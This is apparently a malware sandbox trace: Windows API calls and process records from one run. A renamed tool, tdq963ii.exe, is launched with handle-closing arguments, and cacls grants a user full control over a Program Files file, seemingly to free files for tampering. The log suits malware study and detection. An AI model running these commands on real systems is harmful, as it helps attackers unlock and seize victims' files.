_wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0240.134] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0240.134] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0240.134] GetProcessHeap () returned 0x3f0000 [0240.134] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0de8 | out: hHeap=0x3f0000) returned 1 [0240.134] GetProcessHeap () returned 0x3f0000 [0240.135] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xe) returned 0x3f0de8 [0240.135] GetProcessHeap () returned 0x3f0000 [0240.135] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f0db8, Size=0xe) returned 0x3f0e00 [0240.135] GetProcessHeap () returned 0x3f0000 [0240.135] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f0e00) returned 0xe [0240.135] GetProcessHeap () returned 0x3f0000 [0240.135] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f0dd0, Size=0x14) returned 0x404440 [0240.135] GetProcessHeap () returned 0x3f0000 [0240.135] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x404440) returned 0x14 [0240.135] _wpopen (_Command="tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner", _Mode="rb") returned 0x77032960 [0240.155] feof (_File=0x77032960) returned 0 [0240.155] ferror (_File=0x77032960) returned 0 [0240.155] GetProcessHeap () returned 0x3f0000 [0240.155] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x108) returned 0x404460 [0240.155] fgets (in: _Buf=0x404468, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0243.178] feof (_File=0x77032960) returned 0 [0243.178] ferror (_File=0x77032960) returned 0 [0243.178] GetProcessHeap () returned 0x3f0000 [0243.178] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x404460, Size=0x208) returned 0x404460 [0243.178] GetProcessHeap () returned 0x3f0000 [0243.178] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x404460) returned 0x208 [0243.178] fgets (in: _Buf=0x4044ae, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0243.178] feof (_File=0x77032960) returned 0 [0243.178] ferror (_File=0x77032960) returned 0 [0243.178] GetProcessHeap () returned 0x3f0000 [0243.178] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x404460, Size=0x308) returned 0x404460 [0243.178] GetProcessHeap () returned 0x3f0000 [0243.178] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x404460) returned 0x308 [0243.178] fgets (in: _Buf=0x4044b1, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0243.380] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0243.381] GetProcessHeap () returned 0x3f0000 [0243.381] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x404460, Size=0x9e) returned 0x404460 [0243.381] GetProcessHeap () returned 0x3f0000 [0243.381] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x404460) returned 0x9e [0243.381] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4044b1, cbMultiByte=73, lpWideCharStr=0x404468, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0243.382] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f10c | out: _Buffer="\r\n") returned 2 [0243.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.382] GetFileType (hFile=0x7) returned 0x2 [0243.383] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.383] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f0cc | out: lpMode=0x14f0cc) returned 1 [0243.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.383] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f0f8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f0f8*=0x2) returned 1 [0243.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0243.386] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14f108 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0243.386] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14f108 | out: _Buffer=">") returned 1 [0243.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.386] GetFileType (hFile=0x7) returned 0x2 [0243.386] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.386] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f0d0 | out: lpMode=0x14f0d0) returned 1 [0243.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.387] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14f0fc, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x14f0fc*=0x26) returned 1 [0243.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.387] GetFileType (hFile=0x7) returned 0x2 [0243.388] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.388] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f354 | out: lpMode=0x14f354) returned 1 [0243.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.388] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x14f380, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x14f380*=0x1) returned 1 [0243.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.389] GetFileType (hFile=0x7) returned 0x2 [0243.389] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.389] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f338 | out: lpMode=0x14f338) returned 1 [0243.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.390] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x414b30*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x14f364, lpReserved=0x0 | out: lpBuffer=0x414b30*, lpNumberOfCharsWritten=0x14f364*=0xc) returned 1 [0243.390] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f370 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0243.390] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.390] GetFileType (hFile=0x7) returned 0x2 [0243.390] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.390] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f330 | out: lpMode=0x14f330) returned 1 [0243.393] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.393] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x14f35c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f35c*=0x2c) returned 1 [0243.395] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f38c | out: _Buffer=") ") returned 2 [0243.395] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.395] GetFileType (hFile=0x7) returned 0x2 [0243.397] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.397] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f34c | out: lpMode=0x14f34c) returned 1 [0243.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.397] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f378, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f378*=0x2) returned 1 [0243.397] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f3ac | out: _Buffer="\r\n") returned 2 [0243.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.398] GetFileType (hFile=0x7) returned 0x2 [0243.398] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.398] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f36c | out: lpMode=0x14f36c) returned 1 [0243.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.398] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f398, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f398*=0x2) returned 1 [0243.400] GetConsoleTitleW (in: lpConsoleTitle=0x14eebc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.402] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4047b0, lpFilePart=0x14e9dc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14e9dc*="Desktop") returned 0x25 [0243.402] SetErrorMode (uMode=0x0) returned 0x1 [0243.402] GetProcessHeap () returned 0x3f0000 [0243.402] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4047a8, Size=0x6e) returned 0x4047a8 [0243.402] GetProcessHeap () returned 0x3f0000 [0243.402] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x4047a8) returned 0x6e [0243.402] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0243.402] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0243.402] GetProcessHeap () returned 0x3f0000 [0243.402] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x120) returned 0x404820 [0243.402] GetProcessHeap () returned 0x3f0000 [0243.402] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x238) returned 0x404948 [0243.402] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0243.403] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x14e778, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e778) returned 0x404af8 [0243.403] FindClose (in: hFindFile=0x404af8 | out: hFindFile=0x404af8) returned 1 [0243.403] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0243.403] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0243.403] GetConsoleTitleW (in: lpConsoleTitle=0x14ec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.403] InitializeProcThreadAttributeList (in: lpAttributeList=0x14ead8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14eba0 | out: lpAttributeList=0x14ead8, lpSize=0x14eba0) returned 1 [0243.403] UpdateProcThreadAttribute (in: lpAttributeList=0x14ead8, dwFlags=0x0, Attribute=0x60001, lpValue=0x14eb98, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14ead8, lpPreviousValue=0x0) returned 1 [0243.403] GetStartupInfoW (in: lpStartupInfo=0x14ea94 | out: lpStartupInfo=0x14ea94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0243.404] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0243.404] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x14eb34*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14eb80 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x14eb80*(hProcess=0x74, hThread=0x84, dwProcessId=0xa18, dwThreadId=0x7a0)) returned 1 [0243.417] CloseHandle (hObject=0x84) returned 1 [0243.417] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0243.417] GetProcessHeap () returned 0x3f0000 [0243.417] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4076d0 | out: hHeap=0x3f0000) returned 1 [0243.417] GetEnvironmentStringsW () returned 0x406b40* [0243.417] GetProcessHeap () returned 0x3f0000 [0243.417] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb82) returned 0x4076d0 [0243.417] FreeEnvironmentStringsW (penv=0x406b40) returned 1 [0243.418] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0244.191] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x14ea74 | out: lpExitCode=0x14ea74*=0x1) returned 1 [0244.191] CloseHandle (hObject=0x74) returned 1 [0244.192] _vsnwprintf (in: _Buffer=0x14ebbc, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ea80 | out: _Buffer="00000001") returned 8 [0244.192] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0244.192] GetProcessHeap () returned 0x3f0000 [0244.192] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4076d0 | out: hHeap=0x3f0000) returned 1 [0244.192] GetEnvironmentStringsW () returned 0x406b40* [0244.192] GetProcessHeap () returned 0x3f0000 [0244.192] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb82) returned 0x4076d0 [0244.192] FreeEnvironmentStringsW (penv=0x406b40) returned 1 [0244.192] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0244.192] GetProcessHeap () returned 0x3f0000 [0244.192] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4076d0 | out: hHeap=0x3f0000) returned 1 [0244.192] GetEnvironmentStringsW () returned 0x406b40* [0244.192] GetProcessHeap () returned 0x3f0000 [0244.192] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb82) returned 0x4076d0 [0244.192] FreeEnvironmentStringsW (penv=0x406b40) returned 1 [0244.192] GetProcessHeap () returned 0x3f0000 [0244.192] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0dd0 | out: hHeap=0x3f0000) returned 1 [0244.192] DeleteProcThreadAttributeList (in: lpAttributeList=0x14ead8 | out: lpAttributeList=0x14ead8) [0244.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.193] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0244.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.193] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0244.194] _get_osfhandle (_FileHandle=0) returned 0x3 [0244.194] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0244.194] SetConsoleInputExeNameW () returned 0x1 [0244.194] GetConsoleOutputCP () returned 0x1b5 [0244.194] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0244.194] SetThreadUILanguage (LangId=0x0) returned 0x409 [0244.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14f4a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0244.195] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0244.195] _get_osfhandle (_FileHandle=3) returned 0x74 [0244.195] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0244.195] GetProcessHeap () returned 0x3f0000 [0244.195] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404a78 | out: hHeap=0x3f0000) returned 1 [0244.195] GetProcessHeap () returned 0x3f0000 [0244.195] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404948 | out: hHeap=0x3f0000) returned 1 [0244.195] GetProcessHeap () returned 0x3f0000 [0244.195] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404820 | out: hHeap=0x3f0000) returned 1 [0244.195] GetProcessHeap () returned 0x3f0000 [0244.195] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4047a8 | out: hHeap=0x3f0000) returned 1 [0244.195] GetProcessHeap () returned 0x3f0000 [0244.195] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404720 | out: hHeap=0x3f0000) returned 1 [0244.195] GetProcessHeap () returned 0x3f0000 [0244.195] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404508 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414b70 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414b28 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0de8 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404440 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0e00 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404408 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4043a8 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404378 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404318 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4042b8 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404238 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4041e0 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0ab8 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404190 | out: hHeap=0x3f0000) returned 1 [0244.196] GetProcessHeap () returned 0x3f0000 [0244.196] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f1250 | out: hHeap=0x3f0000) returned 1 [0244.196] _get_osfhandle (_FileHandle=3) returned 0x74 [0244.197] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0244.197] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14f488, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x14f488*=0x0, lpOverlapped=0x0) returned 1 [0244.197] GetLastError () returned 0x0 [0244.197] _get_osfhandle (_FileHandle=3) returned 0x74 [0244.197] GetFileType (hFile=0x74) returned 0x1 [0244.197] _get_osfhandle (_FileHandle=3) returned 0x74 [0244.197] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0244.197] GetProcessHeap () returned 0x3f0000 [0244.197] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400a) returned 0x414b28 [0244.197] GetProcessHeap () returned 0x3f0000 [0244.197] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414b28 | out: hHeap=0x3f0000) returned 1 [0244.197] _get_osfhandle (_FileHandle=3) returned 0x74 [0244.197] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0244.198] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14f46c, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x14f46c*=0x0, lpOverlapped=0x0) returned 1 [0244.198] GetLastError () returned 0x0 [0244.198] _get_osfhandle (_FileHandle=3) returned 0x74 [0244.198] GetFileType (hFile=0x74) returned 0x1 [0244.198] _get_osfhandle (_FileHandle=3) returned 0x74 [0244.198] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0244.198] GetProcessHeap () returned 0x3f0000 [0244.198] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400a) returned 0x414b28 [0244.198] GetProcessHeap () returned 0x3f0000 [0244.198] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414b28 | out: hHeap=0x3f0000) returned 1 [0244.198] longjmp () [0244.198] _tell (_FileHandle=3) returned 226 [0244.198] _close (_FileHandle=3) returned 0 [0244.198] CmdBatNotification () returned 0x1 [0244.198] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.199] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0244.199] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.199] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0244.199] _get_osfhandle (_FileHandle=0) returned 0x3 [0244.199] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0244.200] SetConsoleInputExeNameW () returned 0x1 [0244.200] GetConsoleOutputCP () returned 0x1b5 [0244.200] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0244.200] SetThreadUILanguage (LangId=0x0) returned 0x409 [0244.200] exit (_Code=1) Process: id = "224" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1c43c000" os_pid = "0x344" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 809 os_tid = 0x690 Thread: id = 826 os_tid = 0xa48 Thread: id = 834 os_tid = 0xb0 Process: id = "225" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x29711000" os_pid = "0x598" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "210" os_parent_pid = "0xab8" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 810 os_tid = 0xaf0 Process: id = "226" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2ae2c000" os_pid = "0x5d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "179" os_parent_pid = "0x74c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Journal.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 814 os_tid = 0xa28 [0221.257] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f784 | out: lpSystemTimeAsFileTime=0x22f784*(dwLowDateTime=0x3bea6060, dwHighDateTime=0x1d68287)) [0221.257] GetCurrentProcessId () returned 0x5d0 [0221.257] GetCurrentThreadId () returned 0xa28 [0221.257] GetTickCount () returned 0x1163276 [0221.257] QueryPerformanceCounter (in: lpPerformanceCount=0x22f77c | out: lpPerformanceCount=0x22f77c*=34159601509) returned 1 [0221.259] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0221.259] __set_app_type (_Type=0x1) [0221.259] __p__fmode () returned 0x770331f4 [0221.259] __p__commode () returned 0x770331fc [0221.260] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0221.260] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, 